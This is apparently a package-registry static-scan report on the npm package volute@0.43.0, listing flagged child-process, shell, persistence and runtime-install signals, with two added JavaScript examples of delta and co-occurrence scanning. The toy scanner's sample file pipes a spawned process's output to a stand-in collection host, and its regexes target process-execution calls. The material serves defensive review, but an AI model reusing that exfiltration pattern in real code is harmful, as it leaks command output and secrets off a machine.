
volute@0.43.0

⚠ Under review

CLI for creating and managing self-modifying AI minds powered by the Claude Agent SDK

Static Scan Results

scanned 2d ago · by rust-scanner

Static analysis flagged 19 finding(s) at 93.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected; the diff against the previous stored version introduced a dangerous source file.

Decision evidence (public snapshot)

Behavioral surface
Source: Child Process, Crypto, Dynamic Require, Environment Vars, Filesystem, Network, Shell, WebSocket
Supply chain: High Entropy Strings, Minified, Obfuscated, Url Strings
Manifest: no manifest risk signals triggered.
scanned 181 file(s), 1.98 MB of source; external domains: 127.0.0.1, api.anthropic.com, api.telegram.org, discord.com, github.com, openrouter.ai, registry.npmjs.org, slack.com, svelte.dev, volute.systems, www.apple.com, www.w3.org (127.0.0.1 is the loopback address, so that entry is a local daemon endpoint rather than an external host)

Source & flagged code

10 flagged
dist/chunk-C6ESRQZ7.js
L9: // [redacted].ts
L10: import { execFileSync } from "child_process";
L11: var slog = logger_default.child("sandbox");
High
Child Process

Package source references child process execution.

dist/chunk-C6ESRQZ7.js · L9
dist/service-4EVZKGSA.js
L116: });
L117: var run = cmd.execute;
L118: export {
High
Shell

Package source references shell execution. The excerpt only shows cmd.execute being aliased to run and exported; the shell invocation itself is not in the lines shown, so confirm what cmd.execute does in the full file before acting on this.

dist/service-4EVZKGSA.js · L116
dist/chunk-PF2AB7VJ.js
matchType = previous_version_dangerous_delta
matchedPackage = volute@0.40.2
matchedIdentity = npm:dm9sdXRl:0.40.2
similarity = 0.775
summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review. The baseline is the last version the scanner has stored (0.40.2), not necessarily the release immediately before 0.43.0, so the delta may span several releases.

dist/chunk-PF2AB7VJ.js
L907: try {
L908: const { getSleepManagerIfReady: getSleepManagerIfReady2 } = await import("./sleep-manager-BVU5D2AE.js");
L909: const sleepMgr = getSleepManagerIfReady2();
Medium
Dynamic Require

Package source references dynamic require/import behavior. The flagged call is an `await import()` of a fixed relative path (a hashed chunk file), not a module specifier computed at runtime.

dist/chunk-PF2AB7VJ.js · L907
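The Critical finding above is a delta check rather than a content check: the scanner compares this version's file set with the last stored version (0.40.2) and escalates when a file that is new in this version carries a dangerous signal. The following is an added example, not volute's code and not the scanner's, showing how such a check can be built from two stored snapshots. The Jaccard similarity over file paths, the danger predicate and the sample snapshots are assumptions; the page does not say how the scanner computes its 0.775.

```javascript
// Added example (not volute's code and not the scanner's code): a
// previous-version delta check over two constructed package snapshots.

// Jaccard similarity of two versions' file sets: |A ∩ B| / |A ∪ B|.
// Assumption: the real scanner's "similarity" may be computed differently.
function fileSetSimilarity(prevFiles, currFiles) {
  const prev = new Set(Object.keys(prevFiles));
  const curr = new Set(Object.keys(currFiles));
  let shared = 0;
  for (const path of prev) if (curr.has(path)) shared++;
  const union = prev.size + curr.size - shared;
  return union === 0 ? 1 : shared / union;
}

// Compares the stored previous version with the current one. isDangerous is a
// (path, contents) predicate supplied by the caller; only files that are new in
// this version are run through it, which is the "absent from the previous
// stored version" condition the finding describes.
function dangerousDelta(prevFiles, currFiles, isDangerous) {
  const added = Object.keys(currFiles).filter((p) => !(p in prevFiles));
  const removed = Object.keys(prevFiles).filter((p) => !(p in currFiles));
  const changed = Object.keys(currFiles).filter(
    (p) => p in prevFiles && prevFiles[p] !== currFiles[p],
  );
  const dangerousAdded = added.filter((p) => isDangerous(p, currFiles[p]));
  return {
    similarity: fileSetSimilarity(prevFiles, currFiles),
    added,
    removed,
    changed,
    dangerousAdded,
    // Mirrors the report's gating: any delta is worth noting, but only a new
    // file that trips the predicate escalates the version.
    severity: dangerousAdded.length > 0 ? "Critical" : "Low",
  };
}

// Danger predicate for the sample: a new file that reaches for child_process.
function reachesChildProcess(_path, contents) {
  return /\bchild_process\b/.test(contents);
}

// Constructed snapshots (hypothetical file names and contents, not the real
// package's files). Each value is the file's contents; a registry scanner would
// normally store a hash per file instead.
const PREVIOUS_SNAPSHOT = {
  "package.json": '{"name":"example","version":"0.1.0"}',
  "dist/index.js": 'export { run } from "./chunk-one.js";',
  "dist/chunk-one.js": 'export function run() { return "ok"; }',
};
const CURRENT_SNAPSHOT = {
  "package.json": '{"name":"example","version":"0.2.0"}',       // changed
  "dist/index.js": 'export { run } from "./chunk-one.js";',      // unchanged
  "dist/chunk-one.js": 'export function run() { return "ok"; }', // unchanged
  "dist/chunk-two.js":                                           // new, dangerous
    'import { execFileSync } from "child_process"; export const sh = (c) => execFileSync(c);',
  "dist/chunk-three.js": "export const VERSION = 2;",            // new, benign
};

const delta = dangerousDelta(PREVIOUS_SNAPSHOT, CURRENT_SNAPSHOT, reachesChildProcess);
console.log(delta);
// similarity 0.6, added 2 files, dangerousAdded ["dist/chunk-two.js"], severity "Critical"
```

Run it with node; the point of the design is that a benign-looking release still produces a high-similarity, low-severity record, and only the combination "new file" plus "dangerous signal" escalates. Modified files (package.json here) are reported separately, since a dangerous change inside an existing file needs a content diff rather than a file-set diff.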
dist/chunk-EE7SZJON.js
L11: // [redacted]-install.ts
L12: import { execFile } from "child_process";
L13: import { mkdirSync, writeFileSync } from "fs";
...
L37: if (opts?.host) args.push("--host", opts.host);
L38: const logPath = resolve(homedir(), ".volute", "system", "daemon.log");
L39: return `<?xml version="1.0" encoding="UTF-8"?>
...
L84: const voluteBin = resolveVoluteBin();
L85: const platform = process.platform;
L86: if (platform === "darwin") {
...
L90: try {
L91: await execFileAsync("launchctl", ["bootout", `${uid}/${LAUNCHD_PLIST_LABEL}`]);
L92: } catch {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration. In the excerpt this is a per-user launchd service on macOS: an XML plist is generated (with the daemon log under ~/.volute/system) and `launchctl bootout` is run against the service label in the user's domain.

dist/chunk-EE7SZJON.js · L11
dist/daemon.js
L471: );
L472: const daemonToken = process.env.VOLUTE_DAEMON_TOKEN;
L473: if (!daemonToken) {
...
L480: ...process.env,
L481: VOLUTE_DAEMON_URL: `http://${daemonLoopback()}:${daemonPort}`,
L482: VOLUTE_DAEMON_TOKEN: daemonToken,
...
L486: };
L487: const child = spawn(process.execPath, [builtinBridge], spawnOpts);
L488: let lastStderr = "";
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking. In the excerpt the three signals are: reading VOLUTE_DAEMON_TOKEN from process.env, passing a loopback daemon URL and that token into the child's environment (the child also inherits the whole parent environment via ...process.env), and spawning the current Node binary (process.execPath) on a bundled bridge script.

dist/daemon.js · L471
L480: ...process.env,
L481: VOLUTE_DAEMON_URL: `http://${daemonLoopback()}:${daemonPort}`,
L482: VOLUTE_DAEMON_TOKEN: daemonToken,
...
L486: };
L487: const child = spawn(process.execPath, [builtinBridge], spawnOpts);
L488: let lastStderr = "";
L489: child.stdout?.pipe(logStream);
L490: child.stderr?.on("data", (chunk) => {
L491: logStream.write(chunk);
L492: lastStderr = chunk.toString().trim();
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking. In the lines shown, the child's stdout is piped to a log stream and its stderr is buffered into lastStderr; the outbound request that would complete an exfiltration path is not in this excerpt and has to be traced in the full file.

dist/daemon.js · L480
L7128: const [cmd, args] = await wrapForIsolation("npm", ["install"], mindName);
L7129: await exec(cmd, args, {
L7130: cwd: variantDir,
...
L7137: const msg = e instanceof Error ? e.message : String(e);
L7138: return c.json({ error: `npm install failed: ${msg}` }, 500);
L7139: }
High
Runtime Package Install

Package source invokes a package manager install command at runtime. Here `npm install` runs in a per-variant directory from a request handler, wrapped by wrapForIsolation; what that wrapper isolates is not visible in the excerpt.

dist/daemon.js · L7128
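The two High findings above for dist/daemon.js come from co-occurrence heuristics: individually weak signals (an environment read, a URL, a spawn call, stdout handling) become a finding when they land in the same file, which is why the report asks for context before blocking. The following is an added example, not code from volute or from the scanner, that reimplements that idea as a toy scanner over constructed sample sources. The regexes, rule names, severities and sample files are assumptions, and a real scanner matches on an AST rather than on text.

```javascript
// Added example (not volute's code and not the scanner's code): a toy version of
// the per-file co-occurrence heuristics behind the daemon.js findings, run over
// constructed sample sources.

// Single-signal detectors. Assumption: these regexes approximate what the
// scanner looks for; a production scanner matches on an AST, not on text.
const SIGNALS = {
  EnvironmentVars: /\bprocess\.env\b/,
  Network: /\bfetch\s*\(|\b(?:https?|net)\.(?:request|get|connect)\s*\(|\bnew\s+WebSocket\s*\(/,
  ChildProcess: /\bchild_process\b|\bspawn(?:Sync)?\s*\(|\bexec(?:File)?(?:Sync)?\s*\(/,
  CommandOutput: /\.(?:stdout|stderr)\b/,
};

// Co-occurrence rules: a rule fires only when every listed signal is present in
// the same file. Names and severities follow the categories in this report.
const RULES = [
  { name: "Child Process", severity: "High", needs: ["ChildProcess"] },
  { name: "Same File Env Network Execution", severity: "High",
    needs: ["EnvironmentVars", "Network", "ChildProcess"] },
  { name: "Command Output Exfiltration", severity: "High",
    needs: ["ChildProcess", "CommandOutput", "Network"] },
  { name: "Network", severity: "Medium", needs: ["Network"] },
  { name: "Environment Vars", severity: "Medium", needs: ["EnvironmentVars"] },
];

const SEVERITY_ORDER = { Critical: 0, High: 1, Medium: 2, Low: 3 };

// Returns the set of signal names whose detector matches the file's source.
function signalsIn(source) {
  return new Set(Object.keys(SIGNALS).filter((name) => SIGNALS[name].test(source)));
}

// Scans a { path: source } map and returns findings sorted by severity. Files
// are scanned independently, which is why a token read in one file and a
// request made in another never combine into a single High finding.
function scanPackage(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    const present = signalsIn(source);
    for (const rule of RULES) {
      if (rule.needs.every((s) => present.has(s))) {
        findings.push({ severity: rule.severity, name: rule.name, path });
      }
    }
  }
  return findings.sort((a, b) => SEVERITY_ORDER[a.severity] - SEVERITY_ORDER[b.severity]);
}

// Roll-up like the report's "1 Critical · 6 High · ..." line.
function summarize(findings) {
  const counts = { Critical: 0, High: 0, Medium: 0, Low: 0 };
  for (const f of findings) counts[f.severity]++;
  return counts;
}

// Constructed sample sources (hypothetical files, not taken from the package).
// bridge.js deliberately puts all four signals in one file; the other two show
// that the same signals split across files only produce the Medium findings.
const SAMPLE_FILES = {
  "bridge.js": `
    const { spawn } = require("child_process");
    const child = spawn(process.execPath, ["worker.js"], { env: { ...process.env } });
    child.stdout.on("data", (chunk) => {
      fetch("https://example.invalid/collect", { method: "POST", body: chunk });
    });
  `,
  "config.js": `const port = Number(process.env.PORT ?? 8080);`,
  "client.js": `const res = await fetch("https://example.invalid/api");`,
};

const findings = scanPackage(SAMPLE_FILES);
for (const f of findings) console.log(`${f.severity} · ${f.name} · ${f.path}`);
console.log(summarize(findings)); // { Critical: 0, High: 3, Medium: 4, Low: 0 }
```

The sample is built so that bridge.js trips both co-occurrence rules while config.js and client.js, which together contain the same env and network signals, only produce the Medium per-signal findings. That is the property a reviewer should keep in mind when reading the daemon.js findings: a High co-occurrence hit says the signals share a file, not that data actually flows from one to the other.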
dist/skills/dreaming/scripts/wake-context-dreams.sh
path = [redacted]-context-dreams.sh
kind = build_helper
sizeBytes = 1180
magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

dist/skills/dreaming/scripts/wake-context-dreams.sh
templates/_base/.init/.local/hooks/wake-context.sh
path = templates/_base/.init/.local/hooks/wake-context.sh
kind = payload_in_excluded_dir
sizeBytes = 421
magicHex = [redacted]
High
Payload In Excluded Dir

Package hides binary, compressed, or executable-looking payloads in test/fixture/hidden paths. The flagged file is a 421-byte shell script under a dot-directory (.init/.local/hooks) in the package's templates; the rule keys on the path, so read the script's contents directly before treating it as a hidden payload.

templates/_base/.init/.local/hooks/wake-context.sh

Findings

1 Critical · 6 High · 6 Medium · 6 Low

Critical · Previous Version Dangerous Delta · dist/chunk-PF2AB7VJ.js
High · Child Process · dist/chunk-C6ESRQZ7.js
High · Shell · dist/service-4EVZKGSA.js
High · Same File Env Network Execution · dist/daemon.js
High · Command Output Exfiltration · dist/daemon.js
High · Runtime Package Install · dist/daemon.js
High · Payload In Excluded Dir · templates/_base/.init/.local/hooks/wake-context.sh
Medium · Dynamic Require · dist/chunk-PF2AB7VJ.js
Medium · Network
Medium · Environment Vars
Medium · Install Persistence · dist/chunk-EE7SZJON.js
Medium · Ships Build Helper · dist/skills/dreaming/scripts/wake-context-dreams.sh
Medium · Structural Risk Force Deep Review
Low · Non Install Lifecycle Scripts
Low · Scripts Present
Low · Filesystem
Low · Obfuscated
Low · High Entropy Strings
Low · Url Strings